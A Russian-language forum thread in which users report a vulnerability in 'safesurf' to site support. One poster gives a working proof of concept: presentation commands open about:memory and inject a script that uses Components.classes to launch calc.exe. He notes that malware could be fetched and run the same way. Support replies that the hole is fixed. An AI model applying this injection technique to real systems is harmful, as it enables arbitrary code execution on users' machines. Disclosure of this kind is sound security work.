уязвимость

[bardak]

Добрый день, обнаружил достаточно серьезную уязвимость на вашем сайте, с кем можно поговорить по этому вопросу? писал в скайп jetswaplive, в техподдержку не отвечают.

[loller5]

Если через тикеты писали, то ответят до 48 часов.

[promot]

Здравствуйте дорогие детки. Сейчас я расскажу сказку о том как запустить вирус на любой машинке, где установлен safesurf

Собственно уязвимость в том, что safesurf позволяет открыть через команды презентации внутренние страницы браузера, такие как about:memory и т.д., через которые можно получить доступ к Components.classes.

Презентация может быть такой

Код: Выделить всё

Переход  about:memory
Вставить скрипт <dls(path_to/inject.js)>

Ну, собственно, так можно запустить калькулятор (содержимое inject.js):

Код: Выделить всё

var file = Components.classes["@mozilla.org/file/local;1"].createInstance(Components.interfaces.nsILocalFile);
file.initWithPath("C:\\Windows\\System32\\calc.exe");
file.launch();

Закачать и запустить какую-нибудь злобную программку, думаю, тоже труда не составит. Делайте выводы господа администраторы...

____________________________________________________

Проверим
loller5

____________________________________________________

Да уж, как я понимаю, работает только с данной странице, т.к. есть загрузка файла?
loller5

Добавлено в 29 апр 2015, 19:02

Ну я другие страницы не смотрел, может на каких-то еще возможно.

[Support]

Спасибо, уязвимость закрыли.

[bardak]

а то что я написал вообще никого не интересует...